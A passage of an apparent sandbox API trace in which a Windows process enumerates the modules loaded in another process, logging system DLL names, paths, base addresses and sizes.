CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.355] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb4e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")) returned 0x20 [0069.382] CoTaskMemFree (pv=0xd910e0) [0069.382] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6730000, lpmodinfo=0x23fe1e8, cb=0x18 | out: lpmodinfo=0x23fe1e8*(lpBaseOfDll=0x7fef6730000, SizeOfImage=0x1bd000, EntryPoint=0x7fef6731010)) returned 1 [0069.394] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.394] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6730000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="pnidui.dll") returned 0xa [0069.406] CoTaskMemFree (pv=0xd910e0) [0069.406] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.406] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6730000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll")) returned 0x1e [0069.420] CoTaskMemFree (pv=0xd910e0) [0069.420] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6710000, lpmodinfo=0x24003a8, cb=0x18 | out: lpmodinfo=0x24003a8*(lpBaseOfDll=0x7fef6710000, SizeOfImage=0x1f000, EntryPoint=0x7fef6713580)) returned 1 [0069.431] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.431] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6710000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="QUtil.dll") returned 0x9 [0069.443] CoTaskMemFree (pv=0xd910e0) [0069.443] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.443] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6710000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\QUtil.dll" (normalized: "c:\\windows\\system32\\qutil.dll")) returned 0x1d [0069.455] CoTaskMemFree (pv=0xd910e0) [0069.455] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd2a0000, lpmodinfo=0x2402568, cb=0x18 | out: lpmodinfo=0x2402568*(lpBaseOfDll=0x7fefd2a0000, SizeOfImage=0x6d000, EntryPoint=0x7fefd2a1010)) returned 1 [0069.464] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.464] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd2a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wevtapi.dll") returned 0xb [0069.474] CoTaskMemFree (pv=0xd910e0) [0069.474] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.474] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd2a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")) returned 0x1f [0069.483] CoTaskMemFree (pv=0xd910e0) [0069.483] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac20000, lpmodinfo=0x2404728, cb=0x18 | out: lpmodinfo=0x2404728*(lpBaseOfDll=0x7fefac20000, SizeOfImage=0x11000, EntryPoint=0x7fefac216ac)) returned 1 [0069.492] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.492] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac20000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0069.502] CoTaskMemFree (pv=0xd910e0) [0069.502] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.502] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac20000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")) returned 0x21 [0069.511] CoTaskMemFree (pv=0xd910e0) [0069.511] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff970000, lpmodinfo=0x24068f8, cb=0x18 | out: lpmodinfo=0x24068f8*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0069.520] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.520] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff970000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0069.529] CoTaskMemFree (pv=0xd910e0) [0069.529] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.529] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff970000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0069.538] CoTaskMemFree (pv=0xd910e0) [0069.538] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefac00000, lpmodinfo=0x2408ab8, cb=0x18 | out: lpmodinfo=0x2408ab8*(lpBaseOfDll=0x7fefac00000, SizeOfImage=0x18000, EntryPoint=0x7fefac01bf8)) returned 1 [0069.547] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.547] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefac00000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0069.556] CoTaskMemFree (pv=0xd910e0) [0069.556] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.556] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefac00000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")) returned 0x20 [0069.567] CoTaskMemFree (pv=0xd910e0) [0069.567] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefa5d0000, lpmodinfo=0x240ac88, cb=0x18 | out: lpmodinfo=0x240ac88*(lpBaseOfDll=0x7fefa5d0000, SizeOfImage=0xc000, EntryPoint=0x7fefa5d602c)) returned 1 [0069.576] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.576] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefa5d0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="npmproxy.dll") returned 0xc [0069.585] CoTaskMemFree (pv=0xd910e0) [0069.585] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.585] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefa5d0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")) returned 0x20 [0069.595] CoTaskMemFree (pv=0xd910e0) [0069.595] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef64c0000, lpmodinfo=0x240ce58, cb=0x18 | out: lpmodinfo=0x240ce58*(lpBaseOfDll=0x7fef64c0000, SizeOfImage=0x3f000, EntryPoint=0x7fef64c12c0)) returned 1 [0069.605] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.605] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef64c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="cscobj.dll") returned 0xa [0069.614] CoTaskMemFree (pv=0xd910e0) [0069.614] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.614] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef64c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll")) returned 0x1e [0069.623] CoTaskMemFree (pv=0xd910e0) [0069.623] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef64a0000, lpmodinfo=0x240f018, cb=0x18 | out: lpmodinfo=0x240f018*(lpBaseOfDll=0x7fef64a0000, SizeOfImage=0x20000, EntryPoint=0x7fef64a1010)) returned 1 [0069.634] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.634] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef64a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="Wlanapi.dll") returned 0xb [0069.644] CoTaskMemFree (pv=0xd910e0) [0069.644] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.644] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef64a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")) returned 0x1f [0069.653] CoTaskMemFree (pv=0xd910e0) [0069.653] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb850000, lpmodinfo=0x24111f0, cb=0x18 | out: lpmodinfo=0x24111f0*(lpBaseOfDll=0x7fefb850000, SizeOfImage=0x7000, EntryPoint=0x7fefb851b24)) returned 1 [0069.663] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.663] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb850000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wlanutil.dll") returned 0xc [0069.672] CoTaskMemFree (pv=0xd910e0) [0069.672] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.672] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb850000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wlanutil.dll" (normalized: "c:\\windows\\system32\\wlanutil.dll")) returned 0x20 [0069.684] CoTaskMemFree (pv=0xd910e0) [0069.684] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6440000, lpmodinfo=0x24133c0, cb=0x18 | out: lpmodinfo=0x24133c0*(lpBaseOfDll=0x7fef6440000, SizeOfImage=0x5e000, EntryPoint=0x7fef647a7fc)) returned 1 [0069.693] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.693] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6440000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wwanapi.dll") returned 0xb [0069.703] CoTaskMemFree (pv=0xd910e0) [0069.703] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.703] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6440000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wwanapi.dll" (normalized: "c:\\windows\\system32\\wwanapi.dll")) returned 0x1f [0069.712] CoTaskMemFree (pv=0xd910e0) [0069.712] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6430000, lpmodinfo=0x2415580, cb=0x18 | out: lpmodinfo=0x2415580*(lpBaseOfDll=0x7fef6430000, SizeOfImage=0xd000, EntryPoint=0x7fef6437104)) returned 1 [0069.722] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.722] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6430000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wwapi.dll") returned 0x9 [0069.731] CoTaskMemFree (pv=0xd910e0) [0069.731] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.731] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6430000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll")) returned 0x1d [0069.741] CoTaskMemFree (pv=0xd910e0) [0069.741] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef63e0000, lpmodinfo=0x2417740, cb=0x18 | out: lpmodinfo=0x2417740*(lpBaseOfDll=0x7fef63e0000, SizeOfImage=0x45000, EntryPoint=0x7fef63e4190)) returned 1 [0069.750] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.750] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef63e0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="QAgent.dll") returned 0xa [0069.760] CoTaskMemFree (pv=0xd910e0) [0069.760] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.760] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef63e0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\QAgent.dll" (normalized: "c:\\windows\\system32\\qagent.dll")) returned 0x1e [0069.769] CoTaskMemFree (pv=0xd910e0) [0069.769] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef6380000, lpmodinfo=0x2419900, cb=0x18 | out: lpmodinfo=0x2419900*(lpBaseOfDll=0x7fef6380000, SizeOfImage=0x58000, EntryPoint=0x7fef63830f0)) returned 1 [0069.779] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.779] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef6380000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="srchadmin.dll") returned 0xd [0069.789] CoTaskMemFree (pv=0xd910e0) [0069.789] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.789] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef6380000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\srchadmin.dll" (normalized: "c:\\windows\\system32\\srchadmin.dll")) returned 0x21 [0069.800] CoTaskMemFree (pv=0xd910e0) [0069.800] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef62c0000, lpmodinfo=0x241bad0, cb=0x18 | out: lpmodinfo=0x241bad0*(lpBaseOfDll=0x7fef62c0000, SizeOfImage=0xb5000, EntryPoint=0x7fef62e1cd0)) returned 1 [0069.812] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.812] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef62c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="bthprops.cpl") returned 0xc [0069.824] CoTaskMemFree (pv=0xd910e0) [0069.824] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.824] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef62c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\bthprops.cpl" (normalized: "c:\\windows\\system32\\bthprops.cpl")) returned 0x20 [0069.834] CoTaskMemFree (pv=0xd910e0) [0069.834] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef5700000, lpmodinfo=0x241dca0, cb=0x18 | out: lpmodinfo=0x241dca0*(lpBaseOfDll=0x7fef5700000, SizeOfImage=0xbb7000, EntryPoint=0x7fef5701bd8)) returned 1 [0069.843] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.843] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef5700000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="ieframe.dll") returned 0xb [0069.853] CoTaskMemFree (pv=0xd910e0) [0069.853] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.854] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef5700000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")) returned 0x1f [0069.870] CoTaskMemFree (pv=0xd910e0) [0069.870] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef56a0000, lpmodinfo=0x241fe60, cb=0x18 | out: lpmodinfo=0x241fe60*(lpBaseOfDll=0x7fef56a0000, SizeOfImage=0x54000, EntryPoint=0x7fef56a104c)) returned 1 [0069.880] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.880] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef56a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="OLEACC.dll") returned 0xa [0069.890] CoTaskMemFree (pv=0xd910e0) [0069.890] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.890] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef56a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\OLEACC.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")) returned 0x1e [0069.901] CoTaskMemFree (pv=0xd910e0) [0069.901] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef5470000, lpmodinfo=0x2422020, cb=0x18 | out: lpmodinfo=0x2422020*(lpBaseOfDll=0x7fef5470000, SizeOfImage=0x22b000, EntryPoint=0x7fef5471f00)) returned 1 [0069.911] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.911] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef5470000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SyncCenter.dll") returned 0xe [0069.921] CoTaskMemFree (pv=0xd910e0) [0069.921] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.921] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef5470000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll")) returned 0x22 [0069.931] CoTaskMemFree (pv=0xd910e0) [0069.931] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef53a0000, lpmodinfo=0x24241f0, cb=0x18 | out: lpmodinfo=0x24241f0*(lpBaseOfDll=0x7fef53a0000, SizeOfImage=0xc2000, EntryPoint=0x7fef53c04b4)) returned 1 [0069.941] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.941] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef53a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="Actioncenter.dll") returned 0x10 [0069.951] CoTaskMemFree (pv=0xd910e0) [0069.951] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.951] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef53a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\Actioncenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll")) returned 0x24 [0069.961] CoTaskMemFree (pv=0xd910e0) [0069.961] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef5320000, lpmodinfo=0x24263d0, cb=0x18 | out: lpmodinfo=0x24263d0*(lpBaseOfDll=0x7fef5320000, SizeOfImage=0x7f000, EntryPoint=0x7fef5321070)) returned 1 [0069.971] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.971] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef5320000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="imapi2.dll") returned 0xa [0069.981] CoTaskMemFree (pv=0xd910e0) [0069.981] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0069.981] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef5320000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\imapi2.dll" (normalized: "c:\\windows\\system32\\imapi2.dll")) returned 0x1e [0069.991] CoTaskMemFree (pv=0xd910e0) [0069.991] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef52c0000, lpmodinfo=0x2428590, cb=0x18 | out: lpmodinfo=0x2428590*(lpBaseOfDll=0x7fef52c0000, SizeOfImage=0x55000, EntryPoint=0x7fef52c26e4)) returned 1 [0070.005] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.005] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef52c0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="hgcpl.dll") returned 0x9 [0070.017] CoTaskMemFree (pv=0xd910e0) [0070.017] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.017] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef52c0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\hgcpl.dll" (normalized: "c:\\windows\\system32\\hgcpl.dll")) returned 0x1d [0070.028] CoTaskMemFree (pv=0xd910e0) [0070.028] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef5280000, lpmodinfo=0x242a750, cb=0x18 | out: lpmodinfo=0x242a750*(lpBaseOfDll=0x7fef5280000, SizeOfImage=0x31000, EntryPoint=0x7fef5281b24)) returned 1 [0070.038] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.038] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef5280000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="provsvc.dll") returned 0xb [0070.048] CoTaskMemFree (pv=0xd910e0) [0070.048] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.048] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef5280000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll")) returned 0x1f [0070.059] CoTaskMemFree (pv=0xd910e0) [0070.059] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef97b0000, lpmodinfo=0x242c910, cb=0x18 | out: lpmodinfo=0x242c910*(lpBaseOfDll=0x7fef97b0000, SizeOfImage=0x74000, EntryPoint=0x7fef97b66f0)) returned 1 [0070.069] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.069] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef97b0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="netprofm.dll") returned 0xc [0070.079] CoTaskMemFree (pv=0xd910e0) [0070.079] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.079] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef97b0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")) returned 0x20 [0070.091] CoTaskMemFree (pv=0xd910e0) [0070.091] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd680000, lpmodinfo=0x242eae0, cb=0x18 | out: lpmodinfo=0x242eae0*(lpBaseOfDll=0x7fefd680000, SizeOfImage=0x91000, EntryPoint=0x7fefd681440)) returned 1 [0070.102] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.102] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd680000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="SXS.DLL") returned 0x7 [0070.113] CoTaskMemFree (pv=0xd910e0) [0070.113] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.113] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd680000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SXS.DLL" (normalized: "c:\\windows\\system32\\sxs.dll")) returned 0x1b [0070.123] CoTaskMemFree (pv=0xd910e0) [0070.123] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef51a0000, lpmodinfo=0x2430c90, cb=0x18 | out: lpmodinfo=0x2430c90*(lpBaseOfDll=0x7fef51a0000, SizeOfImage=0xd7000, EntryPoint=0x7fef51a1254)) returned 1 [0070.134] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.134] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef51a0000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="fxsst.dll") returned 0x9 [0070.144] CoTaskMemFree (pv=0xd910e0) [0070.144] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.144] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef51a0000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\fxsst.dll" (normalized: "c:\\windows\\system32\\fxsst.dll")) returned 0x1d [0070.154] CoTaskMemFree (pv=0xd910e0) [0070.154] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef5100000, lpmodinfo=0x2432e50, cb=0x18 | out: lpmodinfo=0x2432e50*(lpBaseOfDll=0x7fef5100000, SizeOfImage=0x9d000, EntryPoint=0x7fef518d52c)) returned 1 [0070.165] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.165] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef5100000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="FXSAPI.dll") returned 0xa [0070.176] CoTaskMemFree (pv=0xd910e0) [0070.176] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.176] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef5100000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\FXSAPI.dll" (normalized: "c:\\windows\\system32\\fxsapi.dll")) returned 0x1e [0070.186] CoTaskMemFree (pv=0xd910e0) [0070.186] GetModuleInformation (in: hProcess=0x214, hModule=0x75450000, lpmodinfo=0x2435010, cb=0x18 | out: lpmodinfo=0x2435010*(lpBaseOfDll=0x75450000, SizeOfImage=0xe3000, EntryPoint=0x0)) returned 1 [0070.203] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.203] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75450000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="FXSRESM.DLL") returned 0xb [0070.213] CoTaskMemFree (pv=0xd910e0) [0070.214] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.214] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75450000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\FXSRESM.DLL" (normalized: "c:\\windows\\system32\\fxsresm.dll")) returned 0x1f [0070.225] CoTaskMemFree (pv=0xd910e0) [0070.225] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef7a30000, lpmodinfo=0x24371e8, cb=0x18 | out: lpmodinfo=0x24371e8*(lpBaseOfDll=0x7fef7a30000, SizeOfImage=0x28000, EntryPoint=0x7fef7a43cc4)) returned 1 [0070.236] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.236] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7a30000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wscinterop.dll") returned 0xe [0070.246] CoTaskMemFree (pv=0xd910e0) [0070.246] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.246] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7a30000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll")) returned 0x22 [0070.257] CoTaskMemFree (pv=0xd910e0) [0070.257] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb180000, lpmodinfo=0x24393b8, cb=0x18 | out: lpmodinfo=0x24393b8*(lpBaseOfDll=0x7fefb180000, SizeOfImage=0x13000, EntryPoint=0x7fefb18a8b8)) returned 1 [0070.271] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.271] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb180000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="WSCAPI.dll") returned 0xa [0070.285] CoTaskMemFree (pv=0xd910e0) [0070.285] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.285] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb180000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WSCAPI.dll" (normalized: "c:\\windows\\system32\\wscapi.dll")) returned 0x1e [0070.299] CoTaskMemFree (pv=0xd910e0) [0070.299] GetModuleInformation (in: hProcess=0x214, hModule=0x7fef7910000, lpmodinfo=0x243b578, cb=0x18 | out: lpmodinfo=0x243b578*(lpBaseOfDll=0x7fef7910000, SizeOfImage=0x11f000, EntryPoint=0x7fef792339c)) returned 1 [0070.313] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.313] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fef7910000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="wscui.cpl") returned 0x9 [0070.326] CoTaskMemFree (pv=0xd910e0) [0070.326] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.326] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fef7910000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl")) returned 0x1d [0070.337] CoTaskMemFree (pv=0xd910e0) [0070.337] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb160000, lpmodinfo=0x243d738, cb=0x18 | out: lpmodinfo=0x243d738*(lpBaseOfDll=0x7fefb160000, SizeOfImage=0x18000, EntryPoint=0x7fefb161010)) returned 1 [0070.348] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.348] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb160000, lpBaseName=0xd910e0, nSize=0x800 | out: lpBaseName="MPR.dll") returned 0x7 [0070.359] CoTaskMemFree (pv=0xd910e0) [0070.359] CoTaskMemAlloc (cb=0x804) returned 0xd910e0 [0070.359] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb160000, lpFilename=0xd910e0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MPR.dll" (normalized: "c:\\windows\\system32\\mpr.dll")) returned 0x1b [0070.370] CoTaskMemFree (pv=0xd910e0) [0070.370] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb150000, 